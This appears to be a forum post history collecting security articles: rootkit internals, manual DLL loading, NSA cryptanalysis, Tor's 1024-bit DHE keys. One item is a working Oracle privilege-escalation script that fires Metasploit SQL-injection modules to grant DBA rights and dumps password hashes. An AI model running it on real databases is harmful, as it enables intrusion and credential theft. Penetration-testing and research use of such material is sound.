Everything posted by Nytro

  1. Inside Windows Rootkits
By Chad Tilbury on September 4, 2013

Despite being written in 2006, Chris Ries' paper Inside Windows Rootkits is still surprisingly relevant. About the only thing missing is a discussion of new(er) x64 mitigation techniques like Kernel Mode Code Signing and Kernel Patch Protection (aka PatchGuard). Few resources have explained rootkit internals so simply. As an example, Figure 2 from the paper neatly ties together the rootkit hooking universe:

Figure 2: Potential places to intercept a call to the FindNextFile function, Inside Windows Rootkits by Chris Ries

The original PDF is a little hard to find these days, but here are a couple of links:
Chris Ries - Inside Windows Rootkits
http://thehackademy.net/madchat/vxdevl/library/Inside%20Windows%20Rootkits.pdf

Source: Inside Windows Rootkits | Forensic Methods
  2. Loading Win32/64 DLLs "manually" without LoadLibrary()
By pasztorpisti, 8 Sep 2013

Download LoadDLL.zip (Visual C++ 2010 solution with example program and C/C++ DLLs) - 20.4 KB

Introduction

Sooner or later many people start thinking about loading a DLL without LoadLibrary(). OK, maybe not so many... It has only a few advantages and can introduce lots of inconvenient problems when coding the DLL (depending on what your DLL does) compared to a situation where you load the DLL with an ordinary LoadLibrary() call, so this technique has limited use. (I will address the inconvenience problems below.) Still, this tip can serve as a tutorial if you want to understand what's going on behind the curtains... I myself used this stuff to write DLLs in C/C++ instead of coding offset-independent assembly (in an anticheat engine), but that is another story.

Implementation

The most important steps of DLL loading are:
  • Mapping or loading the DLL into memory.
  • Relocating offsets in the DLL using the relocation table of the DLL (if present).
  • Resolving the dependencies of the DLL, loading other DLLs needed by this DLL and resolving the offsets of the needed functions.
  • Calling its entrypoint (if present) with the DLL_PROCESS_ATTACH parameter.

I wrote the code that performed these steps but then quickly found out something is not OK: this loaded DLL doesn't have a valid HMODULE/HINSTANCE handle, and many Windows functions expect you to specify one (for example, GetProcAddress(), CreateDialog(), and so on...). Actually the HINSTANCE handle of a module is nothing more than the address of the DOS/PE header of the loaded DLL in memory. I tried to pass this address to the functions but it didn't work, because Windows checks whether this handle is really a handle and not only the contents of memory! This makes using manually loaded DLLs a bit harder! I had to write my own GetProcAddress() because the Windows version didn't work with my DLLs.

Later I found out that I want to use dialog resources in the DLL, and CreateDialog() also requires a module handle to get the dialog resources from the DLL. For this reason I invented my custom FindResource() function that works with manually loaded DLLs, and it can be used to find dialog resources that can be passed to the CreateDialogIndirect() function. You can use other types of resources as well in manually loaded DLLs if you find a function for that resource that cooperates with FindResource(). In this tip you get the code for the manual DLL loader and GetProcAddress(), but I post the resource related functions in another tip.

Limitations

  • The loaded DLL doesn't have an HMODULE, so it makes life harder, especially when it's about resources.
  • The DllMain() doesn't receive DLL_THREAD_ATTACH and DLL_THREAD_DETACH notifications. You could simulate this by creating a small DLL that you load with normal LoadLibrary(), and from the DllMain() of this normally loaded DLL you could call the entrypoint of your manually loaded DLLs in case of DLL_THREAD_ATTACH/DLL_THREAD_DETACH.
  • If your DLL imports other DLLs, then the other DLLs are loaded with the WinAPI LoadLibrary(). This is actually not a limitation, just mentioned for your information. Actually it would be useless to start loading, for example, kernel32.dll with manual DLL loading; most system DLLs would probably malfunction/crash!
  • I've written my DLLs with the /NODEFAULTLIB linker option, which means you can't reach CRT functions, and it reduces your DLL size considerably (like with 4K intros). But then you have to go with pure WinAPI! Unfortunately the CRT of MS is very complex and relies on the HMODULE of the loaded DLL, so you can't use the CRT. This can be quite inconvenient, but you can overcome this by writing your own mini CRT.

I've provided one such mini CRT in my C++ example without attempting to be comprehensive, but it at least allows you to use the most basic C++ features: automatically initialized static variables, new/delete operators. BTW, if you are about to use this code then you should understand most of these problems, and you should appreciate that writing a C/C++ DLL without CRT is still much more convenient than writing something as an offset-independent or relocatable assembly patch.

Using the code

  • Write your DLL in C/C++ without using CRT (link with /NODEFAULTLIB).
  • Load your DLL with the LoadLibrary() code I provided.
  • You can use my custom GetProcAddress() on the loaded DLL.
  • If you want to use dialog resources (or some other kind of resource, but dialog is the most common) then you can use the FindResource() function I provided in one of my other tips (and the CreateDialogIndirect WinAPI function), because that works with manually loaded DLLs as well: The inner working of FindResource() and LoadString() Win32 functions.

Download the attached VC++2010 solution that contains a sample program that loads and uses 2 DLLs. One DLL has been written in C and the other in C++.

Source: Loading Win32/64 DLLs "manually" without LoadLibrary() - CodeProject
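The relocation step described above, as an added example in Python (mine, not the article's loader code): it walks the .reloc section's IMAGE_BASE_RELOCATION blocks (8-byte header, then 16-bit entries with the type in the top 4 bits and the page offset in the low 12), applies the load-address delta to a constructed PE32-style image, and rejects malformed blocks. The function names and the sample image are my own.

```python
import struct

# Relocation entry types from the PE/COFF specification (same numbering as winnt.h)
IMAGE_REL_BASED_ABSOLUTE = 0   # padding entry, no fixup
IMAGE_REL_BASED_HIGHLOW = 3    # 32-bit absolute address (PE32)
IMAGE_REL_BASED_DIR64 = 10     # 64-bit absolute address (PE32+)


def parse_reloc_blocks(reloc_data):
    """Walk a .reloc section: each block is an 8-byte IMAGE_BASE_RELOCATION
    header (page RVA, SizeOfBlock) followed by 16-bit entries.
    Yields (page_rva, [(type, target_rva), ...]) for every block."""
    off = 0
    while off + 8 <= len(reloc_data):
        page_rva, size = struct.unpack_from("<II", reloc_data, off)
        if size == 0:
            break  # zero-filled tail of the section, nothing more to read
        if size < 8 or size % 2 or off + size > len(reloc_data):
            raise ValueError("malformed relocation block at offset %d" % off)
        entries = []
        for (e,) in struct.iter_unpack("<H", reloc_data[off + 8:off + size]):
            entries.append((e >> 12, page_rva + (e & 0x0FFF)))
        yield page_rva, entries
        off += size


def apply_relocations(image, reloc_data, delta):
    """Return (patched_image, fixup_count) after adding `delta` (actual load
    address minus the optional header's ImageBase) to every HIGHLOW / DIR64
    target. Raises ValueError on unknown types or out-of-image targets."""
    image = bytearray(image)
    count = 0
    for _page_rva, entries in parse_reloc_blocks(reloc_data):
        for typ, rva in entries:
            if typ == IMAGE_REL_BASED_ABSOLUTE:
                continue
            if typ == IMAGE_REL_BASED_HIGHLOW:
                fmt, width = "<I", 4
            elif typ == IMAGE_REL_BASED_DIR64:
                fmt, width = "<Q", 8
            else:
                raise ValueError("unsupported relocation type %d" % typ)
            if rva + width > len(image):
                raise ValueError("relocation target 0x%x outside image" % rva)
            (value,) = struct.unpack_from(fmt, image, rva)
            struct.pack_into(fmt, image, rva, (value + delta) & ((1 << (8 * width)) - 1))
            count += 1
    return bytes(image), count


def make_block(page_rva, entries):
    """Build one relocation block from raw 16-bit entries; pads to a 4-byte
    boundary with an ABSOLUTE entry, as linkers do."""
    if len(entries) % 2:
        entries = entries + [IMAGE_REL_BASED_ABSOLUTE << 12]
    return (struct.pack("<II", page_rva, 8 + 2 * len(entries))
            + struct.pack("<%dH" % len(entries), *entries))


def demo():
    """Constructed image: ImageBase 0x400000 with two absolute pointers on
    different pages, mapped at 0x10000000 instead (delta 0x0FC00000)."""
    image_base, load_addr = 0x00400000, 0x10000000
    image = bytearray(0x2000)
    struct.pack_into("<I", image, 0x0010, image_base + 0x1234)
    struct.pack_into("<I", image, 0x1008, image_base + 0x2000)
    reloc = (make_block(0x0000, [(IMAGE_REL_BASED_HIGHLOW << 12) | 0x010])
             + make_block(0x1000, [(IMAGE_REL_BASED_HIGHLOW << 12) | 0x008]))
    patched, count = apply_relocations(image, reloc, load_addr - image_base)
    (p1,) = struct.unpack_from("<I", patched, 0x0010)
    (p2,) = struct.unpack_from("<I", patched, 0x1008)
    return count, p1, p2


if __name__ == "__main__":
    count, p1, p2 = demo()
    print("fixups applied: %d, pointers now 0x%08x and 0x%08x" % (count, p1, p2))
```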
  3. Crypto AG Multiple Hagelin Cipher Machine NSA Backdoor Encryption Compromise
Disclosure Date 1992-03-01

Several Crypto AG machines based on Boris Hagelin's design are known to have a backdoor in the encryption scheme. In 1957, the United States National Security Agency (NSA) brokered a deal with Hagelin allowing them to place a backdoor into the cipher scheme. This allowed the NSA to trivially access secret communications between two devices, as used by the Iranian Islamic regime, Saddam Hussein, Moammar Gadhafi, Ferdinand Marcos, Idi Amin, and even the Vatican. This backdoored access was shared with intelligence agencies in England as well. Not until 1992 was the backdoor finally published.

Location: Context Dependent
Attack Type: Cryptographic
Impact: Loss of Integrity
Solution: Discontinued Product
Exploit: Exploit Private
Disclosure: Uncoordinated Disclosure

Due to the encryption device being compromised through the National Security Agency backdoor, it is widely accepted that it should no longer be used. It is recommended that an alternate, stronger device be used to ensure data is properly protected.

Source: 95427: Crypto AG Multiple Hagelin Cipher Machine NSA Backdoor Encryption Compromise

It's not exactly the classic exploit you were expecting, but the story is interesting.
  4. [h=1]Chris Hadnagy Nonverbal Human Hacking[/h]
As time goes by, and defenses get stronger, attackers are responding by upping their game as well. Techniques and tactics that defenders must contend with keep escalating, making it much more difficult to contend with and track. With that in mind, social engineering is the easiest and quickest way into companies. The team at Social-Engineer.Org have analyzed some of the ways that social engineers manipulate their targets and then interviewed some of the top minds in the world on the subjects of con-men, persuasion, body language and microexpressions. In addition, we have personally taken training with some of the great minds like Dr. Paul Ekman. All of this has led us to research the topic of non-verbal human hacking. It is a mixture of the principles of NLP, body language and microexpressions used to manipulate targets into an emotional state that allows for control.
  5. [h=1]Ange Albertini A Bit More of PE[/h]
Among other things, I briefly introduced in Hashdays 2011 (cf hashdays2011.corkami.com) my recent PE experiments, already failing all the tools I tried. I will focus this time only on the PE format, describing in detail the weirdness of the format, pushing it as usual to its limits.
  6. [h=1]Browser Extensions - The Backdoor To Stealth Malware[/h] Julien Sobrier SOURCE Seattle 2012
  7. [h=1]Building Dictionaries And Destroying Hashes Using Amazon EC2[/h] Steve Werby & Randy Todd SOURCE Seattle 2012
  8. [h=2]Oracle Exploitation – Privilege Escalation[/h]
September 7, 2013 milo2012

Many times during Penetration Tests, we found a limited account for the Oracle database server. The next step would be to find a SQL injection vulnerability to obtain DBA privileges. There are a number of Metasploit modules that we can use to escalate to DBA privileges. The Metasploit modules in the script below are for different versions of Oracle database servers. I can't remember which Metasploit modules are for which versions. To speed things up, I wrote a script that does the below:
(1) Check if the account specified has access to the database
(2) Check if the account has DBA privileges
(3) If no, check the version of the Oracle database server
(4) Select the relevant Oracle SQL injection modules for that version of Oracle database and write a Metasploit resource script to disk
(5) Run the Metasploit resource script and attempt to gain DBA privileges
(6) Check permissions of the account and verify if DBA privileges have been obtained.

ora_priv.py script

The script is still a work in progress. You can download the script via the below link.
https://github.com/milo2012/pentest_scripts/blob/master/oracle_pillage/ora_priv.py

[code]
import time
import sys
import csv
import re
import argparse
import urllib
import os.path
import fileinput
import subprocess
import socket
import os
import itertools
from collections import defaultdict
from pprint import pprint
from termcolor import colored
from subprocess import call

sid = ""
metasploitPath = ""
#metasploitPath = "/pentest/metasploit-framework/"

# Made by Keith Lee
# http://milo2012.wordpress.com
# @keith55

try:
    import cx_Oracle
except ImportError:
    print "[!] Please install cx_Oracle"
    sys.exit()


def msfPrivEscUnknown(username, password, hostname, sid):
    # Write a resource script that tries the remaining modules regardless of version
    outputMsfFile = "msfresource.rc"
    myfile = open(outputMsfFile, "w")
    stmt = "setg DBUSER "+username+"\n"
    stmt += "setg DBPASS "+password+"\n"
    stmt += "setg SQL grant dba to "+username+"\n"
    stmt += "setg SID "+sid+"\n"
    stmt += "setg RHOST "+hostname+"\n"
    myfile.write(stmt)
    #Last Attempts
    myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish2\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish3\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/dbms_metadata_get_granted_xml\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/dbms_metadata_get_xml\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/dbms_metadata_open\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/droptable_trigger\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/lt_compressworkspace\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/lt_mergeworkspace\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/lt_removeworkspace\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/lt_rollbackworkspace\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("exit\n")
    myfile.close()
    command = metasploitPath+"msfconsole -r "+os.getcwd()+"/msfresource.rc"
    print command
    call(command, shell=True)


def msfPrivEsc(username, password, hostname, sid):
    #Check version before doing privilege escalation
    """
    orcl1 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid)
    curs = orcl1.cursor()
    curs.execute("select * from v$version")
    row = curs.fetchone()
    curs.close()
    oracleVer = str(row)
    """
    oracleVer = "10.1"   # version detection above is still disabled (work in progress)
    outputMsfFile = "msfresource.rc"
    myfile = open(outputMsfFile, "w")
    stmt = "setg DBUSER "+username+"\n"
    stmt += "setg DBPASS "+password+"\n"
    stmt += "setg SQL grant dba to "+username+"\n"
    stmt += "setg SID "+sid+"\n"
    stmt += "setg RHOST "+hostname+"\n"
    myfile.write(stmt)
    #if "9.0" in str(row) or "10.1" in str(row) or "10.2" in str(row):
    if "9.0" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n")
        myfile.write("exploit\n")
        myfile.write("sleep 3\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n")
        myfile.write("exploit\n")
        myfile.write("sleep 3\n")
    if "9.0" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n")
        myfile.write("exploit\n")
        myfile.write("sleep 3\n")
    if "10.1" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n")
        myfile.write("exploit\n")
        myfile.write("sleep 3\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n")
        myfile.write("exploit\n")
        myfile.write("sleep 3\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
    if "10.2" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/jvm_os_code_10g\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
    if "11.0" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
    if "11.1" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/jvm_os_code_10g\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/jvm_os_code_11g\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
    if "11.2" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/jvm_os_code_11g\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
    myfile.write("exit\n")
    myfile.close()
    command = metasploitPath+"msfconsole -r "+os.getcwd()+"/msfresource.rc"
    print command
    call(command, shell=True)


def dumpHashes(username, password, hostname, sid):
    orcl = cx_Oracle.connect(username+'/'+password+'@'+hostname+':1521/'+sid)
    curs = orcl.cursor()
    curs.execute("SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'")
    test1 = curs.fetchall()
    print colored("\n[+] Below are the password hashes for SID: "+sid+".", "red", attrs=['bold'])
    for i in test1:
        print i
    curs.close()


def checkPermissions(username, password, hostname, sid, firstRun):
    # Returns True if the account can read v$database (DBA-level access), False otherwise
    try:
        orcl = cx_Oracle.connect(username+'/'+password+'@'+hostname+':1521/'+sid)
        curs = orcl.cursor()
        curs.execute("select * from v$database")  #Get a list of all databases
        curs.close()
        print colored(str("[+] ["+sid+"]"+" Testing: "+username.strip()+"/"+password.strip()+". (Success)"), "red", attrs=['bold'])
        dumpHashes(username, password, hostname, sid)
        return True
    except cx_Oracle.DatabaseError as e:
        error, = e.args
        if error.code == 1017:
            # ORA-01017: invalid username/password
            print "[-] Testing: "+username.strip()+"/"+password.strip()+". (Fail)"
            sys.exit()
        if error.code == 942:
            # ORA-00942: table or view does not exist (no privilege on v$database)
            if firstRun == True:
                print colored("[+] ["+sid+"]"+" Testing: "+username.strip()+"/"+password.strip()+". (Insufficient Privileges). Trying to escalate privileges.", "red", attrs=['bold'])
        return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Oracle Privilege Escalation')
    parser.add_argument('-host', help='IP or host name of Oracle server')
    parser.add_argument('-hostFile', dest='hostFile', help='File containing IP addresses of oracle servers')
    parser.add_argument('-u', dest='username', help='Use this username to authenticate')
    parser.add_argument('-p', dest='password', help='Use this password to authenticate')
    parser.add_argument('-sid', dest='sid', help='Use this sid')
    args = vars(parser.parse_args())
    hostList = []
    counter = 0
    if args['host'] != None:
        counter += 1
    if args['hostFile'] != None:
        counter += 1
    if args['hostFile'] != None and args['host'] == None:
        for line in open(args['hostFile'], 'r'):
            hostList.append(line.strip())
    if args['host'] != None and args['hostFile'] == None:
        hostList.append(args['host'])
    if counter == 0 or counter > 1:
        print colored("[+] Please use either -host or -hostFile.", "red", attrs=['bold'])
        sys.exit(0)
    if args['sid'] != None:
        sid = args['sid']
    #Check if username/password is provided in the command line
    credCount = 0
    if args['username'] != None:
        credCount += 1
    if args['password'] != None:
        credCount += 1
    if credCount == 1:  # fixed: the original test (credCount>1 and credCount<2) could never be true
        print "[!] You need to provide both -u and -p."
        sys.exit(0)
    #Load hostname
    for hostname in hostList:
        if len(hostname) < 1:
            sys.exit(0)
        socketAvail = False
        try:
            socket.setdefaulttimeout(2)
            s = socket.socket()
            s.connect((hostname, 1521))
            socketAvail = True
            print "[+] Connected to "+hostname+":1521"
        except:
            print "[-] Cannot connect to "+hostname+":1521"
        if socketAvail == True:
            username = args['username']
            password = args['password']
            print "[+] [sID:"+sid+"] Testing accounts."
            if checkPermissions(username, password, hostname, sid, firstRun=True) == False:
                print colored("[+] Attempting Metasploit Oracle SQL Privilege Escalation", "red", attrs=['bold'])
                msfPrivEsc(username, password, hostname, sid)
                if checkPermissions(username, password, hostname, sid, firstRun=False) == False:
                    print colored("[+] Attempting Additional Oracle SQL Privilege Escalation", "red", attrs=['bold'])
                    msfPrivEscUnknown(username, password, hostname, sid)
                    if checkPermissions(username, password, hostname, sid, firstRun=False) == False:
                        print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Unable to Escalate to DBA)", "red", attrs=['bold'])
                    else:
                        print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)", "red", attrs=['bold'])
                else:
                    print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)", "red", attrs=['bold'])
            else:
                print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)", "red", attrs=['bold'])
[/code]

Source: Oracle Exploitation – Privilege Escalation | Milo2012's Security Blog
  9. Polishing Chrome for Fun and Profit
29/08/2013
Nils & Jon

Agenda
  • Introduction
  • Google Chrome
  • Pwn2Own Vulnerabilities
  • Demo

Google Chrome
  • Widely considered to be the most secure web browser available
  • Designed from the ground up with security in mind
  • Lots of security work ongoing
    – Code reviews
    – Fuzzing (own code & 3rd party)

Download: https://t.co/mZMq4aun1K
  10. September 6, 2013
The NSA's Cryptographic Capabilities

The latest Snowden document is the US intelligence "black budget." There's a lot of information in the few pages the Washington Post decided to publish, including an introduction by Director of National Intelligence James Clapper. In it, he drops a tantalizing hint: "Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic."

Honestly, I'm skeptical. Whatever the NSA has up its top-secret sleeves, the mathematics of cryptography will still be the most secure part of any encryption system. I worry a lot more about poorly designed cryptographic products, software bugs, bad passwords, companies that collaborate with the NSA to leak all or part of the keys, and insecure computers and networks. Those are where the real vulnerabilities are, and where the NSA spends the bulk of its efforts.

This isn't the first time we've heard this rumor. In a WIRED article last year, longtime NSA-watcher James Bamford wrote:

According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US.

We have no further information from Clapper, Snowden, or this other source of Bamford's. But we can speculate.

Perhaps the NSA has some new mathematics that breaks one or more of the popular encryption algorithms: AES, Twofish, Serpent, triple-DES, Serpent. It wouldn't be the first time this happened. Back in the 1970s, the NSA knew of a cryptanalytic technique called "differential cryptanalysis" that was unknown in the academic world. That technique broke a variety of other academic and commercial algorithms that we all thought secure. We learned better in the early 1990s, and now design algorithms to be resistant to that technique.

It's very probable that the NSA has newer techniques that remain undiscovered in academia. Even so, such techniques are unlikely to result in a practical attack that can break actual encrypted plaintext.

The naive way to break an encryption algorithm is to brute-force the key. The complexity of that attack is 2^n, where n is the key length. All cryptanalytic attacks can be viewed as shortcuts to that method. And since the efficacy of a brute-force attack is a direct function of key length, these attacks effectively shorten the key. So if, for example, the best attack against DES has a complexity of 2^39, that effectively shortens DES's 56-bit key by 17 bits.

That's a really good attack, by the way.

Right now the upper practical limit on brute force is somewhere under 80 bits. However, using that as a guide gives us some indication as to how good an attack has to be to break any of the modern algorithms. These days, encryption algorithms have, at a minimum, 128-bit keys. That means any NSA cryptanalytic breakthrough has to reduce the effective key length by at least 48 bits in order to be practical.

There's more, though. That DES attack requires an impractical 70 terabytes of known plaintext encrypted with the key we're trying to break. Other mathematical attacks require similar amounts of data. In order to be effective in decrypting actual operational traffic, the NSA needs an attack that can be executed with the known plaintext in a common MS-Word header: much, much less.

So while the NSA certainly has symmetric cryptanalysis capabilities that we in the academic world do not, converting that into practical attacks on the sorts of data it is likely to encounter seems so impossible as to be fanciful.

More likely is that the NSA has some mathematical breakthrough that affects one or more public-key algorithms. There are a lot of mathematical tricks involved in public-key cryptanalysis, and absolutely no theory that provides any limits on how powerful those tricks can be.

Breakthroughs in factoring have occurred regularly over the past several decades, allowing us to break ever-larger public keys. Much of the public-key cryptography we use today involves elliptic curves, something that is even more ripe for mathematical breakthroughs. It is not unreasonable to assume that the NSA has some techniques in this area that we in the academic world do not. Certainly the fact that the NSA is pushing elliptic-curve cryptography is some indication that it can break them more easily.

If we think that's the case, the fix is easy: increase the key lengths.

Assuming the hypothetical NSA breakthroughs don't totally break public-cryptography -- and that's a very reasonable assumption -- it's pretty easy to stay a few steps ahead of the NSA by using ever-longer keys. We're already trying to phase out 1024-bit RSA keys in favor of 2048-bit keys. Perhaps we need to jump even further ahead and consider 3072-bit keys. And maybe we should be even more paranoid about elliptic curves and use key lengths above 500 bits.

One last blue-sky possibility: a quantum computer. Quantum computers are still toys in the academic world, but have the theoretical ability to quickly break common public-key algorithms -- regardless of key length -- and to effectively halve the key length of any symmetric algorithm. I think it extraordinarily unlikely that the NSA has built a quantum computer capable of performing the magnitude of calculation necessary to do this, but it's possible. The defense is easy, if annoying: stick with symmetric cryptography based on shared secrets, and use 256-bit keys.

There's a saying inside the NSA: "Cryptanalysis always gets better. It never gets worse." It's naive to assume that, in 2013, we have discovered all the mathematical breakthroughs in cryptography that can ever be discovered. There's a lot more out there, and there will be for centuries.

And the NSA is in a privileged position: It can make use of everything discovered and openly published by the academic world, as well as everything discovered by it in secret.

The NSA has a lot of people thinking about this problem full-time. According to the black budget summary, 35,000 people and $11 billion annually are part of the Department of Defense-wide Consolidated Cryptologic Program. Of that, 4 percent -- or $440 million -- goes to "Research and Technology."

That's an enormous amount of money; probably more than everyone else on the planet spends on cryptography research put together. I'm sure that results in a lot of interesting -- and occasionally groundbreaking -- cryptanalytic research results, maybe some of it even practical.

Still, I trust the mathematics.

This essay originally appeared on Wired.com.

EDITED TO ADD: That was written before I could talk about this.

EDITED TO ADD: The Economist expresses a similar sentiment.

Source: https://www.schneier.com/blog/archives/2013/09/the_nsas_crypto_1.html
  11. [h=3]Tor is still DHE 1024 (NSA crackable)[/h]
By Robert Graham

After more revelations, and expert analysis, we still aren't precisely sure what crypto the NSA can break. But everyone seems to agree that if anything, the NSA can break 1024 RSA/DH keys. Assuming no "breakthroughs", the NSA can spend $1 billion on custom chips that can break such a key in a few hours. We know the NSA builds custom chips; they've got fairly public deals with IBM foundries to build chips.

The problem with Tor is that it still uses these 1024 bit keys for much of its crypto, particularly because most people are still using older versions of the software. The older 2.3 versions of Tor use keys the NSA can crack, but few have upgraded to the newer 2.4 version with better keys.

You can see this for yourself by going to a live listing of Tor servers, like TorStatus - Tor Network Status. Only 10% of the servers have upgraded to version 2.4.

Recently, I ran a "hostile" exit node and recorded the encryption negotiated by incoming connections (the external link encryption, not the internal circuits). This tells me whether they are using the newer or older software. Only about 24% of incoming connections were using the newer software. Here's a list of the counts:

14134 -- 0x0039 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
 5566 -- 0xc013 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
 2314 -- 0x0016 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
  905 -- 0x0033 TLS_DHE_RSA_WITH_AES_128_CBC_SHA
    1 -- 0xc012 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA

The older software negotiates "DHE", which are 1024 bit Diffie-Hellman keys. The newer software chooses ECDHE, which are Elliptical-Curve keys. I show the raw data because I'm confused by the last entry: I'm not sure how the software might negotiate ECDHE+3DES, it seems like a lulz-worthy combination (not that it's insecure -- just odd). Those selecting DHE+3DES are also really old, I think. I don't know enough about Tor, but I suspect anything using DHE+3DES is likely more than 5 years old.

(By the way, I used my Ferret tool to generate this, typing "ferret suites -r ".)

The reason software is out of date is because it takes a long time for repositories to be updated. If you type "apt-get install tor" on a Debian/Ubuntu computer, you get the 2.3 version. And this is what pops up as the suggestion of what you should do when you go to the Tor website. Sure, it warns you that the software might be out-of-date, but it doesn't do a good job pointing out that it's almost a year out of date, and the crypto the older version is using is believed to be crackable by the NSA.

Of course, this is still just guessing about the NSA's capabilities. As it turns out, the newer Elliptical keys may turn out to be relatively easier to crack than people thought, meaning that the older software may in fact be more secure. But since 1024 bit RSA/DH has been the most popular SSL encryption for the past decade, I'd assume that it's that, rather than curves, that the NSA is best at cracking.

Therefore, I'd suggest that the Tor community do a better job getting people to upgrade to 2.4. Old servers with crackable crypto, combined with the likelihood the NSA runs hostile Tor nodes, means that it's of much greater importance.

Source: Errata Security: Tor is still DHE 1024 (NSA crackable)
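An added example (my code, not Robert Graham's and not his Ferret tool) that does the classification the post describes on the cipher-suite counts it quotes: each suite name is split into key exchange, authentication, bulk cipher and MAC; finite-field DHE is flagged as the 1024-bit-group risk discussed, 3DES as a marker of very old software; and the share of ECDHE connections (the post's "about 24%") is computed. SUITE_COUNTS is constructed from the numbers in the post; function names and the dh_bits parameter are my own.

```python
import re

# Constructed from the counts quoted in the post: cipher suite -> connections seen
SUITE_COUNTS = {
    "TLS_DHE_RSA_WITH_AES_256_CBC_SHA": 14134,
    "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA": 5566,
    "TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA": 2314,
    "TLS_DHE_RSA_WITH_AES_128_CBC_SHA": 905,
    "TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA": 1,
}

# IANA-style suite name: TLS_<kx>[_<auth>]_WITH_<cipher>_<mac>
SUITE_RE = re.compile(
    r"^TLS_(?P<kx>ECDHE|DHE|ECDH|RSA|PSK)(?:_(?P<auth>RSA|ECDSA|DSS|PSK))?"
    r"_WITH_(?P<cipher>.+?)_(?P<mac>SHA|SHA256|SHA384|MD5)$")


def parse_suite(name):
    """Split a suite name into key exchange, authentication, bulk cipher and MAC.
    Returns None for names that do not follow the standard pattern."""
    m = SUITE_RE.match(name)
    if not m:
        return None
    parts = m.groupdict()
    if parts["auth"] is None:
        parts["auth"] = parts["kx"]  # e.g. TLS_RSA_WITH_...: RSA does both jobs
    return parts


def assess(name, dh_bits=1024):
    """Issues for one suite: finite-field DHE with a group of at most 1024 bits
    (the post's concern), no forward secrecy, or 3DES as a sign of old software.
    dh_bits is the DH group size the server is known to use; the suite name
    alone does not reveal it."""
    p = parse_suite(name)
    if p is None:
        return ["unparsed"]
    issues = []
    if p["kx"] == "DHE" and dh_bits <= 1024:
        issues.append("ffdh-%d" % dh_bits)
    if p["kx"] not in ("DHE", "ECDHE"):
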